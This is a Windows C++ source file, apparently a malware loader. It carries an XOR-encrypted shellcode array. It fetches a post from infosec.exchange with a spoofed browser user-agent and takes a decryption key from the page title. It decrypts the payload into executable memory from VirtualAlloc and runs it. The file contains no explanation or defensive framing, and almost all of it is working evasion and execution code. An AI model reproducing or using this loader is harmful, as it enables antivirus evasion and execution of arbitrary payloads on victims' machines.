#include "stdafx.h"
#include "windows.h"
#include "winhttp.h"
#include <string>
using std::string;

int _tmain(int argc, _TCHAR* argv[])
{
	DWORD dwSize = 0;
	LPSTR pszOutBuffer;
	DWORD dwDownloaded = 0;
	BOOL  bResults = FALSE;
	HINTERNET  hSession = NULL,
		hConnect = NULL,
		hRequest = NULL;

	unsigned char code[] =
		"\x91\x29\xf1\x92\x95\x84\xa3\x75\x73\x0\x2c\x30\x33\x26\x37\x24\x5e\xa7\x22\x65\x25\xea\x20\x16\x2d\xe7\x3d\x6d\x25\x48\xe6\x33\x52\x3e\xee\x1e\x3f\x3d\x7c\xb7\x27\x2b\x3f\x47\xac\x24\x5e\xb5\xdf\x3c\xc\x1d\x70\x5a\x45\x2d\xae\xbc\x7e\x41\x6c\xa0\x90\x9b\x37\x24\xe4\x27\x53\x8b\x2f\x5d\x3a\x77\xb5\x2d\x3e\x13\xf2\x78\x75\x6a\x70\x79\xe0\x1e\x6f\x75\x73\x8b\xed\xe9\x72\x76\x65\x24\xea\xb5\x7\x67\x25\x60\xa2\x32\xee\x2c\x4f\xfe\x3b\x18\x24\x60\xa2\x26\x86\x3a\x27\x8a\xba\x41\xe6\x55\xfa\x3e\x64\xba\x22\x44\xba\x48\x5c\xa1\x33\xb7\xac\x61\xc3\x34\x72\xc1\x55\x81\x7\x87\x29\x6f\x23\x51\x7b\x45\x54\xb0\x7\xae\x3d\x28\xe4\x35\x57\x49\x6c\xb1\x14\x37\xee\x60\x27\x31\xf8\x40\x71\x28\x73\xa6\x24\xe7\x6b\xfd\x3b\x1\xbd\x20\x2a\x37\x3d\x32\x36\x2f\x32\x58\x2c\x38\x33\x2c\x2d\xef\x83\x55\x32\x52\x92\x81\x2a\x37\x3c\x36\x27\xfe\x61\xe9\x26\x9e\x8d\x89\x38\x24\x5e\xae\x20\x49\xd3\x16\x1b\x18\xc\x2\xa\x1\x73\x41\x3b\x29\xfb\x97\x2c\xab\xad\x39\x4\x26\x6a\x9e\xa7\x25\x36\x24\xe6\x94\x20\x5a\x20\x50\xb2\x3b\x54\xa5\x3c\x26\x3a\xba\x57\x37\xb\xd1\x65\x6c\x6f\x75\x8c\xd5\x85\x6a\x72\x76\x65\x5d\x56\x47\x5d\x30\x43\x53\x5c\x47\x56\x6c\x35\x3d\xfa\xc1\x24\xa6\xb2\xcd\x61\x6c\x6f\x38\x42\xc9\x3e\x32\x18\x75\x36\x25\xd5\x22\xfa\x9f\xab\x61\x72\x76\x65\x93\xba\x9d\xb7\x0\x6d\x61\x5d\x4f\xf\x2f\x1d\x1e\x1a\x7a\x34\x2a\x23\x12\x30\x1f\x5e\x22\xb\x4e\x5f\x8\x14\x37\x24\x18\x5c\x5\x42\x75\x1d\x13\x5f\x2f\x36\x7\x2c\x25\x32\x36\x3e\x7\x24\x13\x52\x1e\x1c\x2c\x44\x69\x34\x59\x16\x0\x3d\x3e\x16\x3f\x45\x74\x2f\x11\x17\x32\xc\x5a\x4\x42\x47\x76\x29\x55\x1f\x4e\x57\x55\x20\x36\x16\x4d\x17\x24\x27\x27\x37\x5c\x1d\x37\x21\x38\x2a\x3e\x28\x2f\x37\x19\x21\x46\x26\x5f\x59\x2e\x39\x3d\x2a\x2f\x2d\x13\x2a\x42\x1f\x7\x1d\x20\x2e\x2\x2a\x3\x3c\x66\x26\x10\x5\x1f\x3f\x5d\x30\x17\x5\x4d\x5b\x3\x2a\x6\x2c\xd\x16\x10\x1d\x41\x1\x2c\x3\x43\x55\x41\x23\x17\x0\x7a\x1f\x2b\x16\x29\xa\x35\x2\x3b\x36\x4b\x2e\x54\x28\x2c\x2d\x9\xa\xd\x17\x55\x5a\x2f\x10\x1e\x3f\x1\x23\x19\x25\x78\x5f\x24\x45\xe\x28\x1a\x3b\x5\x25\x62\x5f\x30\x4a\x44\x5d\x36\x1d\x75\x3b\x89\xac\x32\x28\x37\x3d\x21\x5e\xbc\x20\x48\xd5\x61\x70\x5e\xe1\x6c\x6f\x75\x73\x50\x3e\x32\x3b\xb1\xa7\x87\x3a\x5b\x48\xff\xb8\x29\xfb\xb0\xf\x66\x30\x26\x29\x48\xe4\x90\x3f\x47\xac\x21\x5e\xbc\x20\x53\x24\xa6\xb0\x5b\x63\x74\x14\x8a\xa6\x85\xad\x14\x6d\x3e\xa2\xad\xe7\x66\x73\x0\x24\xdb\x36\x86\x50\x8c\x6f\x75\x73\x0\x92\xb4\x3a\x89\xaa\x18\x6d\x9e\xbf\xe8\x38\x61\x72\x76\x36\x35\x5\x35\x29\x49\xe4\xb0\xb3\x94\x75\x25\xa8\xb5\x73\x10\x6d\x61\x3b\xcc\x3d\xc8\x3c\x90\x73\x0\x6d\x61\x8d\xa3\x2d\xff\x3c\x26\x3b\x89\x8a\x29\xfb\x87\x2d\xe5\xb5\x3c\xb4\xc0\x6d\x41\x72\x76\x2c\xe5\x96\x3c\xc9\x12\xfb\xe8\x90\x76\x65\x6c\x6f\x8a\xa6\x48\xee\xa5\x52\xf3\xa5\x18\xdd\x13\xf8\x7\x25\x60\xb1\xf3\xa5\x19\xbd\x2d\xb0\x58\x7\x61\x2b\x3f\xa2\xae\x9f\xc0\xd1\x56\x92\xb4\x72";	// Use WinHttpOpen to obtain a session handle.
	hSession = WinHttpOpen(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
		WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
		WINHTTP_NO_PROXY_NAME,
		WINHTTP_NO_PROXY_BYPASS, 0);

	// Specify an HTTP server.
	if (hSession)
		hConnect = WinHttpConnect(hSession, L"infosec.exchange",
			80, 0);

	// Create an HTTP request handle.
	if (hConnect)
		hRequest = WinHttpOpenRequest(hConnect, L"GET", L"/@Worty1965/109788789900789551",
			NULL, NULL,
			NULL,
			0);

	// Send a request.
	if (hRequest)
		bResults = WinHttpSendRequest(hRequest,
			WINHTTP_NO_ADDITIONAL_HEADERS, 0,
			WINHTTP_NO_REQUEST_DATA, 0,
			0, 0);

	// End the request.
	if (bResults)
		bResults = WinHttpReceiveResponse(hRequest, NULL);

	char key[10] = "";

	if (bResults)
	{
		do
		{
			// Check for available data.
			dwSize = 0;
			if (!WinHttpQueryDataAvailable(hRequest, &dwSize))
				printf("Error %u in WinHttpQueryDataAvailable.\n",
					GetLastError());

			// Allocate space for the buffer.
			pszOutBuffer = new char[dwSize + 1];
			if (!pszOutBuffer)
			{
				printf("Out of memory\n");
				dwSize = 0;
			}
			else
			{
				// Read the data.
				ZeroMemory(pszOutBuffer, dwSize + 1);

				if (!WinHttpReadData(hRequest, (LPVOID)pszOutBuffer,
					dwSize, &dwDownloaded))
					printf("Error %u in WinHttpReadData.\n", GetLastError());
				else {
					char* pos = strstr(pszOutBuffer, "<title>");
					if (pos) {
						for (int i = pos - pszOutBuffer + 30; i < pos - pszOutBuffer + 39; i++) {
							char tmp[2] = { pszOutBuffer[i], '\0' };
							strcat(key, tmp);
						}
					}
				}
				// Free the memory allocated to the buffer.
				delete[] pszOutBuffer;
			}
		} while (dwSize > 0);
	}

	// Report any errors.
	if (!bResults)
		printf("Error %d has occurred.\n", GetLastError());
	// Close any open handles.
	if (hRequest) WinHttpCloseHandle(hRequest);
	if (hConnect) WinHttpCloseHandle(hConnect);
	if (hSession) WinHttpCloseHandle(hSession);

	unsigned char* xored = (unsigned char*)malloc(sizeof(unsigned char) * sizeof(code));
	for (int i = 0; i < sizeof(code); i++) {
		xored[i] = code[i] ^ key[i % sizeof(key)];
	}

	void* exec = VirtualAlloc(0, sizeof(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	memcpy(exec, xored, sizeof(code));
	((void(*)())exec)();
}